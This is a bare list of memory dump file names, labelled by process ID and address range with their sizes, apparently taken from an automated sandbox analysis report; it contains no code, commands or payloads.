memory/10632-1252-0x0000000002351000-0x000000000237C000-memory.dmpFilesize
172KB
-
memory/10632-1283-0x00000000050A0000-0x00000000050A1000-memory.dmpFilesize
4KB
-
memory/10916-1231-0x0000000000BC0000-0x0000000000BC1000-memory.dmpFilesize
4KB
-
memory/10920-1230-0x0000000000925000-0x0000000000926000-memory.dmpFilesize
4KB
-
memory/10920-1202-0x00007FFE992E0000-0x00007FFE99C80000-memory.dmpFilesize
9.6MB
-
memory/10920-1203-0x0000000000920000-0x0000000000922000-memory.dmpFilesize
8KB
-
memory/10920-1205-0x0000000000922000-0x0000000000924000-memory.dmpFilesize
8KB
-
memory/10944-1209-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB
-
memory/11248-1265-0x0000000000890000-0x0000000000921000-memory.dmpFilesize
580KB
-
memory/11248-1263-0x0000000000CC0000-0x0000000000CC1000-memory.dmpFilesize
4KB
-
memory/11248-1267-0x0000000000400000-0x0000000000492000-memory.dmpFilesize
584KB
-
memory/11292-1291-0x00000000030D0000-0x00000000030D1000-memory.dmpFilesize
4KB
-
memory/11292-1294-0x0000000000400000-0x0000000000492000-memory.dmpFilesize
584KB
-
memory/11292-1292-0x00000000030D0000-0x0000000003161000-memory.dmpFilesize
580KB
-
memory/11792-1242-0x00000000023B0000-0x00000000023B1000-memory.dmpFilesize
4KB
-
memory/12772-1297-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB